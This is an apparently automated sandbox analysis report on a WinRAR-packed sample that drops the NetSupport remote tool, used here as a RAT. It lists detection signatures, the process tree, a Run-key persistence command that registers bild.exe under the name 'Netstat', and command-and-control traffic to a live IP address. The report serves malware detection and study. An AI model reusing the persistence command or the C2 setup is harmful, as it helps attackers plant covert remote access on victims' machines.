Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1556890
MD5:166d71e145b2c802acd2b0a07e070bad
SHA1:1c84d2e573e7096040fbe6e950fbff764aa11096
SHA256:33b22fce68d5d7bd08e86b8506c50bdfcd38c26db5983864e8d33bdf62f53272
Tags:exeuser-Bitsight
Infos:

Detection

NetSupport RAT
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionalty to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 166D71E145B2C802ACD2B0A07E070BAD)
    • cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7672 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • bild.exe (PID: 7688 cmdline: C:\Users\Public\Public\Videos\Video\bild.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7892 cmdline: "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 8168 cmdline: "C:\Users\Public\Public\Videos\Video\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Public\Videos\Video\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\Public\Public\Videos\Video\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\Public\Public\Videos\Video\bild.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\Public\Public\Videos\Video\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\Public\Public\Videos\Video\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000009.00000002.1915079530.0000000000F38000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000009.00000000.1914004958.0000000000822000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 23 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      5.2.bild.exe.820000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        5.0.bild.exe.820000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          4.0.bild.exe.820000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            9.0.bild.exe.820000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              4.2.bild.exe.6d100000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 22 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Execution from Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Public\Videos\Video\bild.exe, CommandLine: C:\Users\Public\Public\Videos\Video\bild.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Public\Videos\Video\bild.exe, NewProcessName: C:\Users\Public\Public\Videos\Video\bild.exe, OriginalFileName: C:\Users\Public\Public\Videos\Video\bild.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7616, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Public\Videos\Video\bild.exe, ProcessId: 7688, ProcessName: bild.exe
                                Sigma detected: New RUN Key Pointing to Suspicious Folder
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Public\Videos\Video\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7672, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Sigma detected: Suspicious Program Location with Network Connections
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.61.128.74, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Public\Videos\Video\bild.exe, Initiated: true, ProcessId: 7688, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Public\Videos\Video\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7672, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Sigma detected: Direct Autorun Keys Modification
                                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7616, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", ProcessId: 7672, ProcessName: reg.exe
                                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7616, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe", ProcessId: 7672, ProcessName: reg.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-11-16T12:53:12.437468+010028277451Malware Command and Control Activity Detected192.168.2.44973045.61.128.74443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\Public\Public\Videos\Video\PCICL32.DLLVirustotal: Detection: 16%Perma Link
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeReversingLabs: Detection: 28%
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeVirustotal: Detection: 49%Perma Link
                                Source: C:\Users\Public\Public\Videos\Video\remcmdstub.exeReversingLabs: Detection: 13%
                                Multi AV Scanner detection for submitted file
                                Source: file.exeReversingLabs: Detection: 50%
                                Source: file.exeVirustotal: Detection: 51%Perma Link
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.5% probability
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,4_2_110AD570
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,5_2_110AD570
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Public\Videos\Video\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: msvcr100.i386.pdb source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, bild.exe, 00000004.00000002.3582942113.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, bild.exe, 00000005.00000002.1835584954.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.1916341976.000000006C971000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000004.00000002.3583091798.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, bild.exe, 00000005.00000002.1835772057.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.1916559157.000000006D0F2000.00000002.00000001.01000000.0000000D.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000004.00000000.1735527672.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000000.1832877239.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000005.00000002.1834377646.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.1914004958.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.1914967107.0000000000822000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000004.00000002.3583184483.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000005.00000002.1835885776.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.1916704363.000000006D105000.00000002.00000001.01000000.0000000B.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.0.dr
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0040A273
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0041A537
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D330
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_11065890
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106A0A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 4_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111266E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
                                Source: C:\Users\Public\Public\Videos\Video\bild.exeCode function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49730 -> 45.61.128.74:443
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.61.128.74
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: bild.exe, bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: bild.exe, bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: bild.exe, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: bild.exe, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: bild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspP
                                Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: bild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspb
                                Source: bild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspx
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
